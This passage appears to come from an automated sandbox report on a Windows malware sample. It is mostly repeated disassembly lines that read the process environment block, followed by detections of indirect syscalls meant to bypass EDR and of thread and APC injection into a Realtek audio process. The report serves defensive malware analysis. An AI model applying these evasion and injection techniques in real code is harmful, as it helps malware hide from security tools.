      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604B0AF mov eax, dword ptr fs:[00000030h]3_2_3604B0AF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360650B7 mov eax, dword ptr fs:[00000030h]3_2_360650B7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB332D mov eax, dword ptr fs:[00000030h]3_2_35FB332D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89303 mov eax, dword ptr fs:[00000030h]3_2_35F89303
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89303 mov eax, dword ptr fs:[00000030h]3_2_35F89303
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D2EC mov eax, dword ptr fs:[00000030h]3_2_35F8D2EC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D2EC mov eax, dword ptr fs:[00000030h]3_2_35F8D2EC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F872E0 mov eax, dword ptr fs:[00000030h]3_2_35F872E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F13E mov eax, dword ptr fs:[00000030h]3_2_3604F13E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC32C0 mov eax, dword ptr fs:[00000030h]3_2_35FC32C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC32C0 mov eax, dword ptr fs:[00000030h]3_2_35FC32C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB32C5 mov eax, dword ptr fs:[00000030h]3_2_35FB32C5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602D140 mov eax, dword ptr fs:[00000030h]3_2_3602D140
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602D140 mov eax, dword ptr fs:[00000030h]3_2_3602D140
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36065149 mov eax, dword ptr fs:[00000030h]3_2_36065149
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063157 mov eax, dword ptr fs:[00000030h]3_2_36063157
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063157 mov eax, dword ptr fs:[00000030h]3_2_36063157
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063157 mov eax, dword ptr fs:[00000030h]3_2_36063157
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F892AF mov eax, dword ptr fs:[00000030h]3_2_35F892AF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97290 mov eax, dword ptr fs:[00000030h]3_2_35F97290
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97290 mov eax, dword ptr fs:[00000030h]3_2_35F97290
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97290 mov eax, dword ptr fs:[00000030h]3_2_35F97290
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B273 mov eax, dword ptr fs:[00000030h]3_2_35F8B273
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B273 mov eax, dword ptr fs:[00000030h]3_2_35F8B273
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B273 mov eax, dword ptr fs:[00000030h]3_2_35F8B273
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360651B6 mov eax, dword ptr fs:[00000030h]3_2_360651B6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF24A mov eax, dword ptr fs:[00000030h]3_2_35FBF24A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602D1F0 mov eax, dword ptr fs:[00000030h]3_2_3602D1F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBFDE0 mov eax, dword ptr fs:[00000030h]3_2_35FBFDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov ecx, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8DDB0 mov eax, dword ptr fs:[00000030h]3_2_35F8DDB0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97DB6 mov eax, dword ptr fs:[00000030h]3_2_35F97DB6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov ecx, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBD71 mov eax, dword ptr fs:[00000030h]3_2_35FCBD71
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBD71 mov eax, dword ptr fs:[00000030h]3_2_35FCBD71
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA5D60 mov eax, dword ptr fs:[00000030h]3_2_35FA5D60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91D50 mov eax, dword ptr fs:[00000030h]3_2_35F91D50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91D50 mov eax, dword ptr fs:[00000030h]3_2_35F91D50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADD4D mov eax, dword ptr fs:[00000030h]3_2_35FADD4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADD4D mov eax, dword ptr fs:[00000030h]3_2_35FADD4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADD4D mov eax, dword ptr fs:[00000030h]3_2_35FADD4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89D46 mov eax, dword ptr fs:[00000030h]3_2_35F89D46
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89D46 mov eax, dword ptr fs:[00000030h]3_2_35F89D46
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89D46 mov ecx, dword ptr fs:[00000030h]3_2_35F89D46
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36017EC3 mov eax, dword ptr fs:[00000030h]3_2_36017EC3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36017EC3 mov ecx, dword ptr fs:[00000030h]3_2_36017EC3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36059ED2 mov eax, dword ptr fs:[00000030h]3_2_36059ED2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8FD20 mov eax, dword ptr fs:[00000030h]3_2_35F8FD20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36033EFC mov eax, dword ptr fs:[00000030h]3_2_36033EFC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FF03 mov eax, dword ptr fs:[00000030h]3_2_3600FF03
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FF03 mov eax, dword ptr fs:[00000030h]3_2_3600FF03
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FF03 mov eax, dword ptr fs:[00000030h]3_2_3600FF03
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87CF1 mov eax, dword ptr fs:[00000030h]3_2_35F87CF1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93CF0 mov eax, dword ptr fs:[00000030h]3_2_35F93CF0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93CF0 mov eax, dword ptr fs:[00000030h]3_2_35F93CF0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADCD1 mov eax, dword ptr fs:[00000030h]3_2_35FADCD1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADCD1 mov eax, dword ptr fs:[00000030h]3_2_35FADCD1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADCD1 mov eax, dword ptr fs:[00000030h]3_2_35FADCD1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9FCC9 mov eax, dword ptr fs:[00000030h]3_2_35F9FCC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC9CCF mov eax, dword ptr fs:[00000030h]3_2_35FC9CCF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604BF4D mov eax, dword ptr fs:[00000030h]3_2_3604BF4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97C95 mov eax, dword ptr fs:[00000030h]3_2_35F97C95
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97C95 mov eax, dword ptr fs:[00000030h]3_2_35F97C95
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBC6E mov eax, dword ptr fs:[00000030h]3_2_35FCBC6E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBC6E mov eax, dword ptr fs:[00000030h]3_2_35FCBC6E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8DC40 mov eax, dword ptr fs:[00000030h]3_2_35F8DC40
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C40 mov eax, dword ptr fs:[00000030h]3_2_35FA3C40
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C20 mov eax, dword ptr fs:[00000030h]3_2_35FA3C20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov ecx, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FFDC mov eax, dword ptr fs:[00000030h]3_2_3600FFDC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89FD0 mov eax, dword ptr fs:[00000030h]3_2_35F89FD0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8BFC0 mov eax, dword ptr fs:[00000030h]3_2_35F8BFC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36027C38 mov eax, dword ptr fs:[00000030h]3_2_36027C38
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36055C38 mov eax, dword ptr fs:[00000030h]3_2_36055C38
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36055C38 mov ecx, dword ptr fs:[00000030h]3_2_36055C38
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91FAA mov eax, dword ptr fs:[00000030h]3_2_35F91FAA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36013C57 mov eax, dword ptr fs:[00000030h]3_2_36013C57
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBBF93 mov eax, dword ptr fs:[00000030h]3_2_35FBBF93
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36013C80 mov ecx, dword ptr fs:[00000030h]3_2_36013C80
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8BF70 mov eax, dword ptr fs:[00000030h]3_2_35F8BF70
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91F70 mov eax, dword ptr fs:[00000030h]3_2_35F91F70
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604FC95 mov eax, dword ptr fs:[00000030h]3_2_3604FC95
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov ecx, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov eax, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov eax, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C98 mov eax, dword ptr fs:[00000030h]3_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8FF30 mov edi, dword ptr fs:[00000030h]3_2_35F8FF30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADF36 mov eax, dword ptr fs:[00000030h]3_2_35FADF36
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36015CD0 mov eax, dword ptr fs:[00000030h]3_2_36015CD0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov ecx, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023CD4 mov eax, dword ptr fs:[00000030h]3_2_36023CD4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36027CE8 mov eax, dword ptr fs:[00000030h]3_2_36027CE8

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtSetContextThread: Indirect: 0x35C93650Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtResumeThread: Indirect: 0x35CF3C70Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtQueueApcThread: Indirect: 0x5C8F482Jump to behavior
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FF9EC163A8F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtSuspendThread: Indirect: 0x35CF3960Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtQueueApcThread: Indirect: 0x35CEF482Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtSetContextThread: Indirect: 0x35CF3650Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtResumeThread: Indirect: 0x5C93C70Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtSuspendThread: Indirect: 0x35C93960Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtQueueApcThread: Indirect: 0x35C8F482Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtSuspendThread: Indirect: 0x5C93960Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtSetContextThread: Indirect: 0x5C93650Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeNtResumeThread: Indirect: 0x35C93C70Jump to behavior
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFA20B42651Jump to behavior
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FF9EC1F9E7F
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeThread register set: target process: 4376Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeThread register set: target process: 4376Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeThread register set: target process: 4376Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess created: C:\Users\user\Desktop\LkzvfB4VFj.exe "C:\Users\user\Desktop\LkzvfB4VFj.exe"Jump to behavior
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: RAVCpl64.exe, 00000004.00000000.93058361809.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.96712076690.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
